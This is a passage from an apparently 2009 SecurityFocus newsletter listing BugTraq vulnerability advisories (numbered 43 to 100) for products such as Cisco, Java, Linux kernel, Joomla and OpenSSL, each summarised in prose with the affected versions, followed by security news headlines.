ProCurve Manager Plus 3.2 and eariler

43. Cisco Unified Communications Manager SIP Service Multiple Denial of Service Vulnerabilities
BugTraq ID: 31367
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/31367
Summary:
Cisco Unified Communications Manager is prone to multiple denial-of-service vulnerabilities.

These issues affect the Session Initiation Protocol (SIP) service.

These issues are documented by Cisco bug IDs CSCsu38644 and CSCsm46064.

An attacker can exploit these issues to cause denial-of-service conditions in the affected application.

44. Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
BugTraq ID: 34240
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34240
Summary:
Sun Java Runtime Environment and Java Development Kit are prone to multiple security vulnerabilities.

Successful exploits may allow attackers to violate the same-origin policy, obtain sensitive information, bypass security restrictions, run untrusted applets with elevated privileges, and cause denial-of-service conditions. This may result in a compromise of affected computers.

These issues affect versions *prior to* the following:

JDK and JRE 6 Update 13
JDK and JRE 5.0 Update 18
SDK and JRE 1.4.2_20
SDK and JRE 1.3.1_25

45. Microsoft April 2009 Advance Notification Multiple Vulnerabilities
BugTraq ID: 34450
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34450
Summary:
Microsoft has released advance notification that the vendor will be releasing eight security bulletins on April 14, 2009. The highest severity rating for these issues is 'Critical'.

These issues affect Windows, Internet Explorer, Office, Excel, and ISA Server.

Successfully exploiting these issues may allow remote or local attackers to compromise affected computers.

Individual records will be created to document these issues when the bulletins are released.

46. ClamAV Prior to 0.95.1 Multiple Remote Denial of Service Vulnerabilities
BugTraq ID: 34446
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34446
Summary:
ClamAV is prone to multiple denial-of-service vulnerabilities when handling malformed files or specially crafted URIs.

Successfully exploiting these issues allows remote attackers to deny service to legitimate users. Given the nature of these issues, attackers may also be able to run arbitrary code, but this has not been confirmed.

Versions prior to ClamAV 0.95.1 are vulnerable.

47. Ghostscript 'jbig2dec' JBIG2 Processing Buffer Overflow Vulnerability
BugTraq ID: 34445
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34445
Summary:
Ghostscript is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it into a finite-sized buffer.

Exploiting this issue may allow remote attackers to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.

Ghostscript 8.64 is vulnerable; other versions may also be affected.

48. IBM Lotus Domino IMAP Server Remote Denial of Service Vulnerability
BugTraq ID: 34441
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34441
Summary:
IBM Lotus Domino IMAP server is prone to a remote denial-of-service vulnerability because the software fails to properly handle certain email attachments.

Successfully exploiting this issue allows remote attackers to crash the affected server, denying further service to legitimate users.

IBM Lotus Domino 8.5 and 8.0.2.1 are vulnerable; other versions may be affected as well.

49. MIT Kerberos 'NegTokenInit' Token Handling Remote Denial Of Service Vulnerability
BugTraq ID: 34257
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34257
Summary:
MIT Kerberos is prone to a remote denial-of-service vulnerability.

An attacker may exploit this issue to crash vulnerable servers, resulting in denial-of-service conditions.

MIT Kerberos 5 1.6.3 is vulnerable; other versions may also be affected.

50. IBM Tivoli Storage Manager Multiple Vulnerabilities
BugTraq ID: 34285
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34285
Summary:
IBM Tivoli Storage Manager is prone to multiple vulnerabilities.

Attackers can exploit these issues to cause denial-of-service conditions or bypass certain security restrictions. The impact of one of the issues is unknown.

These issues affect versions prior to IBM Tivoli Storage Manager 6.1.

51. MIT Kerberos SPNEGO and ASN.1 Multiple Remote Denial Of Service Vulnerabilities
BugTraq ID: 34408
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34408
Summary:
MIT Kerberos is prone to multiple remote denial-of-service vulnerabilities.

An attacker may exploit these issues to crash vulnerable servers, resulting in denial-of-service conditions. Some of these issues may allow attackers to obtain sensitive information.

MIT Kerberos 5 1.6.3 is vulnerable; other versions may also be affected.

52. MIT Kerberos 'asn1_decode_generaltime()' Uninitialized Pointer Memory Corruption Vulnerability
BugTraq ID: 34409
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34409
Summary:
MIT Kerberos is prone to a memory-corruption vulnerability because it fails to properly initialize data structures.

Successful exploits may allow remote attackers to crash Kerberos servers, including the 'kadmind' administration daemon. Given the nature of this issue, attackers may also be able to execute arbitrary code with SYSTEM-level or superuser privileges, but this has not been confirmed.

Versions prior to Kerberos 5.17 and 5.1.6.4 are vulnerable.

53. InnerMedia DynaZip ZIP Archive Handling Multiple Buffer Overflow Vulnerabilities
BugTraq ID: 19143
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/19143
Summary:
DynaZip is prone to multiple remote buffer-overflow vulnerabilities when handling malicious ZIP archives.

A successful attack can allow a remote attacker to corrupt process memory by triggering an overflow condition. This may lead to arbitrary code execution in the context of an affected user and facilitate a remote compromise.

These vulnerabilities affect the following:

DynaZip Max with DZIP32.DLL 5.0.0.7
DynaZip Max Secure with DZIPS32.DLL 6.0.0.4.

Other versions may be vulnerable as well.

NOTE: TurboZIP 6.0 Build 002021004 is also affected by the first issue because it uses the DynaZip library.

54. OpenSSL Multiple Vulnerabilities
BugTraq ID: 34256
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34256
Summary:
OpenSSL is prone to multiple vulnerabilities that may allow attackers to trigger denial-of-service conditions or bypass certain security checks.

Versions prior to OpenSSL 0.9.8k are vulnerable.

55. ejabberd MUC Logs Cross Site Scripting Vulnerability
BugTraq ID: 34133
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34133
Summary:
The 'ejabberd' application is prone to a cross-site scripting vulnerability.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.

Versions prior to ejabberd 2.0.4 are vulnerable.

56. Avahi 'avahi-core/server.c' Multicast DNS Denial Of Service Vulnerability
BugTraq ID: 33946
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33946
Summary:
Avahi is prone to a denial-of-service vulnerability.

A remote attacker may exploit this issue to crash the affected application, denying further service to legitimate users.

Avahi 0.6.23 is vulnerable; other versions may also be affected.

57. FFmpeg 'libavformat/4xm.c' Remote Code Execution Vulnerability
BugTraq ID: 33502
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33502
Summary:
FFmpeg is prone to a remote code-execution vulnerability because it fails to adequately validate user-supplied input.

An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Versions prior to FFmpeg trunk revision 16846 are vulnerable.

58. PHP 'imageRotate()' Uninitialized Memory Information Disclosure Vulnerability
BugTraq ID: 33002
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33002
Summary:
PHP is prone to an information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

PHP 5.2.8 and prior versions are vulnerable.

59. Net-SNMP 'snmpUDPDomain.c' Remote Information Disclosure Vulnerability
BugTraq ID: 33755
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33755
Summary:
Net-SNMP is prone to a remote information-disclosure vulnerability because it fails to properly handle TCP Wrapper authorization rules.

Exploiting this issue will allow attackers to obtain sensitive information that can help them further attacks.

Net-SNMP 5.4.2.1 is vulnerable; other versions are also likely affected.

60. Gretech GOM Player '.srt' File Remote Buffer Overflow Vulnerability
BugTraq ID: 34427
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34427
Summary:
Gretech GOM Player is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

GOM Player 2.1.16.4613 is vulnerable; other versions may also be affected.

61. Joomla! 'com_mailto' Component 'article' Parameter SQL Injection Vulnerability
BugTraq ID: 34433
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34433
Summary:
The 'com_mailto' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

We don't know which versions of Joomla! are affected. We will update this BID as more information emerges.

62. Joomla! cmimarketplace Component 'viewit' Parameter Directory Traversal Vulnerability
BugTraq ID: 34431
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34431
Summary:
The 'cmimarketplace' component for Joomla! is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.

This issue affects cmimarketplace 0.1; other versions may also be affected.

63. Horde Products Local File Include and Cross Site Scripting Vulnerabilities
BugTraq ID: 33491
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33491
Summary:
Horde products are prone to a local file-include vulnerability and a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.

An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.

The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

The issues affect versions prior to the following:

Horde 3.2.4 and 3.3.3
Horde Groupware 1.1.5

64. Horde Turba 'services/obrowser/index.php' HTML Injection Vulnerability
BugTraq ID: 29745
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/29745
Summary:
Horde Turba is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

Horde 3.1.7, 3.2, and prior versions are vulnerable.

65. Horde XSS Filter Cross Site Scripting Vulnerability
BugTraq ID: 33367
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33367
Summary:
Horde is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Note that this issue also affects Turba on Horde IMP.

Versions prior to Horde 3.2.3 and 3.3.1 are vulnerable.

66. Linux Kernel 'exit_notify()' CAP_KILL Verification Local Privilege Escalation Vulnerability
BugTraq ID: 34405
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34405
Summary:
The Linux kernel is prone to a local privilege-escalation vulnerability.

A local attacker can exploit this issue to execute arbitrary code with superuser privileges, resulting in a complete compromise of the affected computer.

Versions prior to Linux kernel 2.6.29-git14 are vulnerable.

67. Bugzilla 'attachment.cgi' Cross Site Request Forgery Vulnerability
BugTraq ID: 34308
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34308
Summary:
Bugzilla is prone to a cross-site request-forgery vulnerability.

An attacker can exploit this issue to submit attachments in the context of the logged-in user.

This issue affects versions prior to Bugzilla 3.2.3 and 3.3.4.

68. LinPHA 1.3.4 Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 34422
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34422
Summary:
LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.

Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.

LinPHA 1.3.4 is vulnerable; other versions may also be affected.

69. Xplode 'module_wrapper.asp' SQL Injection and Cross Site Scripting Vulnerabilities
BugTraq ID: 34419
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34419
Summary:
Xplode is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

70. Linux Kernel 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability
BugTraq ID: 33846
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33846
Summary:
The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory before using using it in a user-accessible operation.

Successful exploits will allow attackers to view portions of kernel memory. Information harvested may be used in further attacks.

Versions prior to Linux Kernel 2.6.28.8 are vulnerable.

71. Linux Kernel 'FWD-TSN' Chunk Remote Buffer Overflow Vulnerability
BugTraq ID: 33113
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33113
Summary:
The Linux Kernel is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.

The issue affects Linux Kernel 2.6.28; other versions may also be vulnerable.

72. Linux Kernel 'seccomp' System Call Security Bypass Vulnerability
BugTraq ID: 33948
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33948
Summary:
The Linux kernel is prone to a local security-bypass vulnerability.

A local attacker may be able to exploit this issue to bypass access control and make restricted system calls, which may result in an elevation of privileges.

73. Linux Kernel '/ipc/shm.c' Local Denial of Service Vulnerability
BugTraq ID: 34020
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34020
Summary:
The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to cause the Linux kernel to lock up, resulting in a denial-of-service condition.

Versions prior to Linux kernel 2.6.28.5 are vulnerable.

74. Linux Kernel 'dell_rbu' Local Denial of Service Vulnerabilities
BugTraq ID: 33428
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33428
Summary:
Linux Kernel is prone to two denial-of-service vulnerabilities.

A local unprivileged attacker can exploit these issues to cause a vulnerable system to crash, resulting in denial-of-service conditions.

These issues affect versions prior to Linux Kernel 2.6.27.13 and 2.6.28.2.

75. Linux Kernel Audit System 'audit_syscall_entry()' System Call Security Bypass Vulnerability
BugTraq ID: 33951
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33951
Summary:
The Linux kernel is prone to a local security-bypass vulnerability.

A local attacker may be able to exploit this issue to bypass audit mechanisms imposed on system calls. This may allow malicious behavior to escape notice.

76. Linux Kernel Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness
BugTraq ID: 33906
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33906
Summary:
The Linux kernel is prone to an origin-validation weakness when dealing with signal handling.

This weakness occurs when a privileged process calls attacker-supplied processes as children. Attackers may exploit this to send arbitrary signals to the privileged parent process.

A local attacker may exploit this issue to kill vulnerable processes, resulting in a denial-of-service condition. In some cases, other attacks may also be possible.

Linux kernel 2.6.28 is vulnerable; other versions may also be affected.

77. XIGLA Absolute Form Processor XE 'login.asp' SQL Injection Vulnerability
BugTraq ID: 34463
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34463
Summary:
Absolute Form Processor XE is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Absolute Form Processor XE 1.5 is vulnerable; other versions may also be affected.

78. WebFileExplorer 'body.asp' SQL Injection Vulnerability
BugTraq ID: 34462
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34462
Summary:
WebFileExplorer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

WebFileExplorer 3.1 is vulnerable; other versions may also be affected.

79. SWF Opener Buffer Overflow Vulnerability
BugTraq ID: 34459
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34459
Summary:
SWF Opener is prone to a remote buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.

Successful exploits may allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

SWF Opener 1.3 is vulnerable; other versions may also be affected.

80. BackendCMS 'main.asp' SQL Injection Vulnerability
BugTraq ID: 34455
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34455
Summary:
BackendCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

BackendCMS 5.0 is vulnerable; other versions may also be affected.

81. EMC RepliStor Multiple Remote Heap Based Buffer Overflow Vulnerabilities
BugTraq ID: 34449
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34449
Summary:
EMC RepliStor is prone to multiple remote heap-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.

A remote attacker can exploit these issues to execute arbitrary code with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.

Versions prior to RepliStor 6.2 SP5 and RepliStor 6.3 SP2 are vulnerable.

82. IBM BladeCenter Advanced Management Module Multiple Remote Vulnerabilities
BugTraq ID: 34447
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34447
Summary:
IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:

- An HTML-injection vulnerability
- A cross-site scripting vulnerability
- An information-disclosure vulnerability
- Multiple cross-site request-forgery vulnerabilities

An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.

Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable.

83. Linux Kernel SPARC 'mremap()' Multiple Denial Of Service Vulnerabilities
BugTraq ID: 33836
Remote: No
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/33836
Summary:
The Linux kernel is prone to multiple denial-of-service vulnerabilities when mapping memory addresses on SPARC-based computers.

Local attackers can leverage these issues to crash the kernel and deny service to legitimate users.

Versions prior to 2.6.25.4 are vulnerable.

84. Linux Kernel 'locks_remove_flock()' Local Race Condition Vulnerability
BugTraq ID: 33237
Remote: No
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/33237
Summary:
The Linux kernel is prone to a local race-condition vulnerability because it fails to properly handle POSIX locks.

A local attacker may exploit this issue to crash the computer or gain elevated privileges.

85. Linux Kernel 64 Bit ABI System Call Parameter Privilege Escalation Vulnerability
BugTraq ID: 33275
Remote: No
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/33275
Summary:
The Linux Kernel is prone to a local privilege-escalation vulnerability.

A local attacker may be able to exploit this issue to read or write to unintended address spaces. This may result in denial-of-service conditions, the disclosure of sensitive information, or privilege escalation.

This issue affects versions prior to Linux 2.6.28.6 on some 64-bit architectures, including s390, PowerPC, SPARC64, and MIPS. Additional architectures may also be affected.

86. Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
BugTraq ID: 34412
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34412
Summary:
The 'mod_jk' module for Apache Tomcat is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

This issue affects mod_jk 1.2.0 through 1.2.26.

87. Tunapie Stream URI Remote Command Execution Vulnerability
BugTraq ID: 34418
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34418
Summary:
Tunapie is prone to a remote command-execution vulnerability because it fails to perform adequate checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary commands in the context of the application. This may aid in further attacks.

Tunapie 2.1 is vulnerable; other versions may also be affected.

88. Tunapie Insecure Temporary File Creation Vulnerability
BugTraq ID: 34417
Remote: No
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34417
Summary:
Tunapie creates a temporary file in an insecure manner.

An attacker with local access could perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application.

Successfully mounting a symlink attack may allow the attacker to delete or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.

This issue affects Tunapie 2.1; other versions may also be affected.

89. Lanius CMS 'upload.php' Arbitrary File Upload Vulnerability
BugTraq ID: 34415
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34415
Summary:
Lanius CMS (formerly known as Drake CMS) is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Versions prior to Lanius CMS 0.5.2 r1094 are vulnerable. Note that Drake CMS 0.4.6 and later versions are also vulnerable.

90. Cisco PIX and ASA Multiple Denial of Service, ACL Bypass, and Authentication Bypass Vulnerabilities
BugTraq ID: 34429
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34429
Summary:
Cisco PIX Security Appliance and ASA 5500 Series Adaptive Security Appliance are prone to multiple denial-of-service vulnerabilities, an ACL-bypass vulnerability, and an authentication-bypass vulnerability.

Remote attackers can exploit these issues to cause an affected device to reload, to force network traffic to bypass ACL rules, or to gain unauthorized access to an affected device. Successful exploits may facilitate further attacks.

These issues are documented by the following Cisco Bug IDs:

CSCsx47543 further documents the issue tracked by CVE-2009-1155.
CSCsv52239 further documents the issue tracked by CVE-2009-1156.
CSCsy22484 further documents the issue tracked by CVE-2009-1157.
CSCsx32675 further documents the issue tracked by CVE-2009-1158.
CSCsw51809 further documents the issue tracked by CVE-2009-1159.
CSCsq91277 further documents the issue tracked by CVE-2009-1160.

91. SASPCMS SQL Injection and Cross Site Scripting Vulnerabilities
BugTraq ID: 34430
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34430
Summary:
SASPCMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SASPCMS 0.9 is vulnerable; other versions may also be affected.

92. OpenGoo Cross Site Scripting And HTML Injection Vulnerabilities
BugTraq ID: 34428
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34428
Summary:
OpenGoo is prone to a cross-site scripting issue and an HTML-injection issue because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

OpenGoo 1.3 and 1.3.1 are vulnerable; other versions may be affected as well.

93. OpenAFS Unix Cache Manager Heap-Based Buffer Overflow Vulnerability
BugTraq ID: 34407
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34407
Summary:
OpenAFS is prone to a remote heap-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer in the Unix cache manager. The issue occurs when the application processes RX packets in a client context.

An attacker can exploit this issue to execute arbitrary code in the context of the Unix cache manager, resulting in a complete compromise of the affected computer. Failed exploit attempts will likely result in a denial of service.

The issue affects these versions:

OpenAFS Unix clients 1.0 through 1.4.8
OpenAFS Unix clients 1.5.0 through 1.5.58

Note that Mac OS X clients are not affected.

94. OpenAFS Error Codes Remote Denial of Service Vulnerabiliy
BugTraq ID: 34404
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34404
Summary:
OpenAFS file server is prone to a denial-of-service vulnerability that occurs on computers running the Linux kernel.

Successfully exploiting this issue allows attackers to cause a kernel panic, denying service to legitimate users.

The issue affects these versions:

OpenAFS 1.0 through 1.4.8
OpenAFS 1.5.0 through 1.5.58

95. RETIRED: vBulletin Admin Control Panel Multiple HTML Injection Vulnerabilities
BugTraq ID: 34393
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34393
Summary:
vBulletin is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

vBulletin 3.8.0 RC2 is vulnerable; other versions may also be affected.

NOTE: This BID is being retired because an attacker must have administrative access to the application to exploit this issue. Therefore, no privileges are gained.

96. Little CMS Monochrome Profiles Null Pointer Dereference Denial of Service Vulnerability
BugTraq ID: 34411
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34411
Summary:
Little CMS is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue by tricking a victim into opening a specially crafted image file.

Successful attacks will cause the application using the affected engine to crash.

NOTE: Other applications that use Little CMS (such as Mozilla Firefox, OpenJDK, and GIMP) are likely vulnerable to this issue as well.

97. RETIRED: Little CMS Monochrome Profiles Null Pointer Dereference Denial of Service Vulnerability
BugTraq ID: 34420
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34420
Summary:
Little CMS is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue by tricking a victim into opening a specially crafted image file.

Successful attacks will cause the application using the affected engine to crash.

Little CMS 1.18 is vulnerable; other versions may also be affected.

NOTE: Other applications that use Little CMS (such as Mozilla Firefox, OpenJDK, and GIMP) are likely vulnerable to this issue as well.

NOTE: This record is being retired because it is a duplicate of BID 34411 (Little CMS Monochrome Profiles Null Pointer Dereference Denial of Service Vulnerability).

98. OpenSSL PKCS Padding RSA Signature Forgery Vulnerability
BugTraq ID: 19849
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/19849
Summary:
OpenSSL is prone to a vulnerability that may allow an attacker to forge an RSA signature. The attacker may be able to forge a PKCS #1 v1.5 signature when an RSA key with exponent 3 is used.

An attacker may exploit this issue to sign digital certificates or RSA keys and take advantage of trust relationships that depend on these credentials, possibly posing as a trusted party and signing a certificate or key.

All versions prior to and including OpenSSL 0.9.7j and 0.9.8b are affected by this vulnerability. Updates are available.

99. Mozilla SeaMonkey/Thunderbird Newsgroup Cancel Message Handling Buffer Overflow Vulnerability
BugTraq ID: 31411
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/31411
Summary:
Mozilla SeaMonkey and Thunderbird are prone to a remote heap-based buffer-overflow vulnerability because they fail to properly bounds-check user-supplied data.

Successfully exploiting this issue may allow remote attackers to execute arbitrary machine code in the context of the vulnerable application; failed exploit attempts will likely crash the application. This may facilitate the remote compromise of affected computers.

The issue affects versions prior to Mozilla Thunderbird 2.0.0.17 and prior to Mozilla SeaMonkey 1.1.12.

100. Mozilla Firefox 2.0.0.14 Multiple Remote Vulnerabilities
BugTraq ID: 30038
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/30038
Summary:
The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Firefox 2.0.0.14 and prior versions.

Exploiting these issues can allow attackers to:

- steal authentication credentials
- obtain potentially sensitive information
- violate the same-origin policy
- execute scripts with elevated privileges
- upload arbitrary files to affected computers
- cause denial-of-service conditions
- execute arbitrary code

Other attacks are also possible.

These issues are present in Firefox 2.0.0.14 and prior versions.

Mozilla Thunderbird is affected by the issues described in Mozilla advisories MFSA 2008-21, MFSA 2008-24, and MFSA 2008-25. Note that these issues arise in Thunderbird only when JavaScript is enabled. JavaScript is not enabled in the default installation.

III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Browsers bashed first in hacking contest
By: Robert Lemos
A security researcher keeps a vulnerability on ice for an entire year, before using it at the Pwn2Own contest to exploit Apple's browser. Microsoft's Internet Explorer 8 falls soon after.
http://www.securityfocus.com/news/11549

2. Experts: U.S. needs to defend its "cyber turf"
By: Robert Lemos
The United States must develop a Monroe Doctrine for the Internet, defining what constitutes its cyberspace and pledging to defend its virtual borders, security experts told Congress.
http://www.securityfocus.com/news/11548

3. Advisor: U.S. needs policy to defend cyberspace
By: Robert Lemos
An Obama transition-team member argues that any future cyber policy needs to deal with the role of the intelligence community, the militarization of cyberspace and designating a lead disaster agency.
http://www.securityfocus.com/news/11547

4. Cabal forms to fight Conficker, offers bounty
By: Robert Lemos
Microsoft offers $250,000 for information leading to the arrest of the author and, along with security firms and Internet service providers, pledges to work to prevent the prolific worm from spreading further.
http://www.securityfocus.com/news/11546

IV. SECURITY JOBS LIST SUMMARY
-------------------------------
V. INCIDENTS LIST SUMMARY
---------------------------
VI. VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
VII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. SecurityFocus Microsoft Newsletter #438
http://www.securityfocus.com/archive/88/502488

